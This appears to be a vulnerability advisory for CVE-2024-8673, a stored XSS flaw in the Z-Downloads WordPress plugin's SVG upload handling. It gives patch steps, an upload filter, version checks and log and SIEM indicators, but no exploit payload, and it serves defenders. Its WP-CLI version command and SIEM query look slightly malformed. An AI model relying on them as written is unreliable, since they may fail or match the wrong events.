CVE-2024-8673
📋 TL;DR
The Z-Downloads WordPress plugin before version 1.11.7 fails to properly validate uploaded SVG files, allowing attackers to upload malicious SVG files containing JavaScript. This vulnerability affects all WordPress sites using vulnerable versions of the Z-Downloads plugin, potentially enabling cross-site scripting (XSS) attacks.
💻 Affected Systems
- Z-Downloads WordPress Plugin
📦 What is this software?
Z Downloads by Urbanbase
⚠️ Risk & Real-World Impact
Worst Case
An attacker could upload a malicious SVG file that executes JavaScript in visitors' browsers, leading to session hijacking, credential theft, or complete site takeover if admin users are targeted.
Likely Case
Attackers upload malicious SVG files that execute JavaScript payloads when viewed, enabling cross-site scripting attacks against site visitors and potentially compromising user accounts.
If Mitigated
With proper file upload restrictions and content security policies, the impact is limited to potential file storage abuse without code execution.
🎯 Exploit Status
Exploitation requires file upload access, which typically requires at least contributor-level permissions in WordPress.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.11.7
Vendor Advisory: https://wpscan.com/vulnerability/fed2cd26-7ccb-419d-b589-978410953bf4/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Z-Downloads plugin. 4. Click 'Update Now' if update available. 5. If no update available, download version 1.11.7+ from WordPress repository and manually update.
🔧 Temporary Workarounds
Disable SVG Uploads
allAdd WordPress filter to block SVG file uploads entirely
Add to theme's functions.php or custom plugin: add_filter('upload_mimes', function($mimes) { unset($mimes['svg']); return $mimes; });
Restrict File Upload Permissions
allLimit file upload capabilities to trusted users only
Use WordPress role management plugins or custom code to restrict 'upload_files' capability to administrators only.
🧯 If You Can't Patch
- Temporarily disable the Z-Downloads plugin until patched
- Implement Content Security Policy (CSP) headers to block inline JavaScript execution
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Z-Downloads version. If version is below 1.11.7, you are vulnerable.Check Version:
wp plugin list --name=z-downloads --field=versionVerify Fix Applied:
After updating, verify Z-Downloads plugin shows version 1.11.7 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Multiple SVG file uploads from single user
- Large SVG files containing script tags
- Failed SVG upload attempts
Network Indicators:
- POST requests to /wp-admin/async-upload.php with SVG files
- SVG files containing JavaScript being served
SIEM Query:
source="wordpress.log" AND ("uploaded file" AND ".svg") OR ("SVG" AND "script")